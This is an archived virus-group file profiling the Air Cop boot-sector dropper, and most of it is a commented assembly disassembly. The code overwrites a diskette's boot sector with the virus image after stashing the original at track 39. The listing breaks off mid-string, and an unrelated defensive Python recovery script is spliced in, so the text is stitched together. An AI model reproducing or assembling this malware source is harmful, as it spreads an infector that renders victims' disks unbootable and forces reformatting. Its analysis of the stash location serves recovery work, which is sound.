💾 Archived View for spam.works › mirrors › textfiles › virus › avcr-01.007 captured on 2023-11-04 at 15:59:46.
Distributed By Amateur Virus Creation & Research Group (AVCR)
-----------------------------------------------------------------------------
Research of the Air Cop Virus by Security Threat

Name of Virus: Air Cop
-----------------------------------------------------------------------------
Alias: Air Dropper
-----------------------------------------------------------------------------
Type Of Code: Not Informed
-----------------------------------------------------------------------------
VSUM Information - Resident boot
-----------------------------------------------------------------------------
Antivirus Detection:
 (1) ThunderByte Anti Virus (TBAV) reported aircop.com as dropper2 virus
 (2) Frisk Software's F-Protect (F-PROT) reported aircop.com as Air Dropper
 (3) McAfee Software's Anti Virus (SCAN.EXE) reported aircop.com as Dropper virus
 (4) Microsoft Anti Virus (MSAV.EXE) reported aircop.com as Dropper
-----------------------------------------------------------------------------
Execution Results:
It is a resident boot virus and it installs itself into C:\, giving you an
error saying "Non-system disk please replace and hit enter".
-----------------------------------------------------------------------------
Cleaning Recommendations:
Cleaning is impossible, but to rid your machine of the virus a boot off a
boot disk is needed, and if drive C: can be accessed it must be reformatted.
-----------------------------------------------------------------------------
Researcher's Notes:
Reads "STACK!" many times over and gives a warning line, then states that the
virus is written by RABID Development Corp.
-----------------------------------------------------------------------------
Disassembly of the AirCop Virus
-----------------------------------------------------------------------------

        PAGE    59,132

;==========================================================================
;==                                                                      ==
;==                              AIRCOP                                  ==
;==                                                                      ==
;==  Created:   11-Jan-91                                                ==
;==  Version:                                                            ==
;==  Passes:    5           Analysis Options on: ABFMNOPU                ==
;==                                                                      ==
;==                                                                      ==
;==========================================================================

movseg  macro   reg16, unused, Imm16    ; Fixup for Assembler
        ifidn   <reg16>, <bx>
        db      0BBh
        endif
        ifidn   <reg16>, <cx>
        db      0B9h
        endif
        ifidn   <reg16>, <dx>
        db      0BAh
        endif
        ifidn   <reg16>, <si>
        db      0BEh
        endif
        ifidn   <reg16>, <di>
        db      0BFh
        endif
        ifidn   <reg16>, <bp>
        db      0BDh
        endif
        ifidn   <reg16>, <sp>
        db      0BCh
        endif
        ifidn   <reg16>, <BX>
        db      0BBH
        endif
        ifidn   <reg16>, <CX>
        db      0B9H
        endif
        ifidn   <reg16>, <DX>
        db      0BAH
        endif
        ifidn   <reg16>, <SI>
        db      0BEH
        endif
        ifidn   <reg16>, <DI>
        db      0BFH
        endif
        ifidn   <reg16>, <BP>
        db      0BDH
        endif
        ifidn   <reg16>, <SP>
        db      0BCH
        endif
        dw      seg Imm16
        endm

keybd_q_head    EQU     1AH             ; (0040:001A=2CH)
keybd_q_tail    EQU     1CH             ; (0040:001C=2CH)

SEG_A           SEGMENT BYTE PUBLIC
                ASSUME  CS:SEG_A, DS:SEG_A

                ORG     100h

AIRCOP          PROC    FAR

START:
                MOV     AX,CS
                MOV     DS,AX
                MOV     SP,3B6H                 ; stack placed inside the image,
                                                ;  just below the message strings
                MOV     AH,0
                MOV     AL,3
                INT     10H                     ; Video display   ah=functn 00h
                                                ;  set display mode in al
                MOV     DX,52BH
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     DX,3C3H
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     DX,4E5H
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     DX,464H
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     DX,480H
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     AX,40H
                MOV     ES,AX
                PUSH    WORD PTR ES:keybd_q_tail ; (0040:001C=2CH)
                POP     WORD PTR ES:keybd_q_head ; (0040:001A=2CH)
                                                ; head := tail empties the BIOS
                                                ;  keyboard buffer before the prompt
                MOV     AX,CS
                MOV     ES,AX
                MOV     AH,8
                INT     21H                     ; DOS Services  ah=function 08h
                                                ;  get keybd char al, no echo
                MOV     CX,3                    ; three attempts per disk operation

LOCLOOP_1:                                      ; read the original boot sector
                PUSH    CX                      ;  (track 0, head 0, sector 1) to 5D0H
                MOV     AX,201H
                MOV     BX,5D0H
                MOV     CX,1
                MOV     DX,0
                INT     13H                     ; Disk  dl=drive a  ah=func 02h
                                                ;  read sectors to memory es:bx
                POP     CX
                JNC     LOC_2                   ; Jump if carry=0
                LOOP    LOCLOOP_1               ; Loop if cx > 0

                MOV     DX,4F2H
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     AX,4CFFH
                INT     21H                     ; DOS Services  ah=function 4Ch
                                                ;  terminate with al=return code
LOC_2:
                MOV     CX,3

LOCLOOP_3:                                      ; write that original boot sector
                PUSH    CX                      ;  to track 39, head 1, sector 9
                MOV     AX,301H
                MOV     BX,5D0H
                MOV     CX,2709H
                MOV     DX,100H
                INT     13H                     ; Disk  dl=drive a  ah=func 03h
                                                ;  write sectors from mem es:bx
                POP     CX
                JNC     LOC_4                   ; Jump if carry=0
                LOOP    LOCLOOP_3               ; Loop if cx > 0

                MOV     DX,50EH
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     AX,4CFFH
                INT     21H                     ; DOS Services  ah=function 4Ch
                                                ;  terminate with al=return code
LOC_4:
                MOV     CX,3

LOCLOOP_5:                                      ; write the image at 7D0H over
                PUSH    CX                      ;  the boot sector (track 0, head 0, sector 1)
                MOV     AX,301H
                MOV     BX,7D0H
                MOV     CX,1
                MOV     DX,0
                INT     13H                     ; Disk  dl=drive a  ah=func 03h
                                                ;  write sectors from mem es:bx
                POP     CX
;*              JNC     LOC_6                   ;*Jump if carry=0
                DB      73H, 0EH                ; JNC +0EH: lands inside DATA_2,
                                                ;  which is why Sourcer could not label it
                LOOP    LOCLOOP_5               ; Loop if cx > 0

                MOV     DX,57CH
                MOV     AH,9
; Sourcer typed the next 26 bytes as data, but they are the two exit paths:
;   CD 21 / B8 FF 4C / CD 21                 INT 21H, MOV AX,4CFFH, INT 21H  (write failed)
;   LOC_6: BA E5 04 / B4 09 / CD 21          MOV DX,4E5H, MOV AH,9, INT 21H
;          BA 9E 05 / B4 09 / CD 21          MOV DX,59EH, MOV AH,9, INT 21H
;          B8 00 4C / CD 21                  MOV AX,4C00H, INT 21H           (success)
DATA_1          DD      0FFB821CDH
DATA_2          DD      0BA21CD4CH
                DB      0E5H, 04H,0B4H, 09H,0CDH, 21H
                DB      0BAH, 9EH, 05H,0B4H, 09H,0CDH
                DB      21H,0B8H, 00H, 4CH,0CDH
                DB      21H
DATA_3          DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      'STACK STACK STACK STACK '
                DB      0DH, 0AH, 'Attention: This virus '
                DB      'sample uses only in research tea'
                DB      'ms.', 0DH, 0AH, '              Plea'
                DB      'se do not use in joking or setti'
                DB      'ng trap on someone.', 0DH, 0AH, 0DH
                DB      0AH, 'Warning! This file installs'
                DB      ' "
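The INT 13H calls in the listing tell a responder exactly where the dropper parks the original boot sector: LOCLOOP_1 reads track 0/head 0/sector 1, LOCLOOP_3 writes it back with CX=2709H, DX=100H. The following Python is an added example (not code from the AVCR file) that decodes those register values into cylinder/head/sector, maps them to a byte offset in a raw diskette image, and checks whether a boot sector is sitting there, which is the first thing to verify before attempting a recovery. It assumes a 360K image (40 cylinders x 2 heads x 9 sectors of 512 bytes), inferred from the write target; the sample image is constructed inline.

```python
# Added example, not part of the AVCR file. Geometry is an assumption
# (360K diskette: 40 cyl x 2 heads x 9 sectors, 512-byte sectors).
SECTOR_SIZE = 512
HEADS_360K, SPT_360K = 2, 9
CYLS_360K = 40

def decode_int13_chs(cx, dx):
    """Unpack the BIOS INT 13H CHS encoding: CH = cylinder low 8 bits,
    CL bits 6-7 = cylinder high bits, CL bits 0-5 = sector, DH = head."""
    ch, cl, dh = (cx >> 8) & 0xFF, cx & 0xFF, (dx >> 8) & 0xFF
    cylinder = ch | ((cl & 0xC0) << 2)
    return cylinder, dh, cl & 0x3F

def chs_to_offset(cylinder, head, sector, heads=HEADS_360K, spt=SPT_360K):
    """Byte offset of a CHS address in a raw image (sectors are 1-based)."""
    lba = (cylinder * heads + head) * spt + (sector - 1)
    return lba * SECTOR_SIZE

def is_boot_sector(sector):
    """A BIOS-bootable sector is 512 bytes ending in the 55 AA signature."""
    return len(sector) == SECTOR_SIZE and sector[-2:] == b"\x55\xAA"

def find_stashed_boot_sector(image, cx=0x2709, dx=0x0100):
    """Report what lives at the sector named by the dropper's LOCLOOP_3 write,
    alongside the state of sector 0, so a recovery decision can be made."""
    c, h, s = decode_int13_chs(cx, dx)
    off = chs_to_offset(c, h, s)
    stash, sector0 = image[off:off + SECTOR_SIZE], image[:SECTOR_SIZE]
    return {"chs": (c, h, s), "offset": off,
            "sector0_bootable": is_boot_sector(sector0),
            "stash_bootable": is_boot_sector(stash),
            "stash_differs_from_sector0": stash != sector0}

def make_sample_image(original_boot, overwriting_boot):
    """Constructed 360K image laid out the way the dropper leaves a diskette:
    original boot sector copied to the stash location, sector 0 replaced."""
    img = bytearray(CYLS_360K * HEADS_360K * SPT_360K * SECTOR_SIZE)
    off = chs_to_offset(*decode_int13_chs(0x2709, 0x0100))
    img[off:off + SECTOR_SIZE] = original_boot
    img[:SECTOR_SIZE] = overwriting_boot
    return bytes(img)

if __name__ == "__main__":
    orig = b"\xEB\x3C\x90ORIGINAL".ljust(510, b"\0") + b"\x55\xAA"
    fake = b"\xEB\x3C\x90REPLACED".ljust(510, b"\0") + b"\x55\xAA"
    print(find_stashed_boot_sector(make_sample_image(orig, fake)))
```

On a real image, `stash_bootable` together with `stash_differs_from_sector0` is the signal that the last sector of the diskette holds a copy worth comparing against a known-good boot sector before anything is written back.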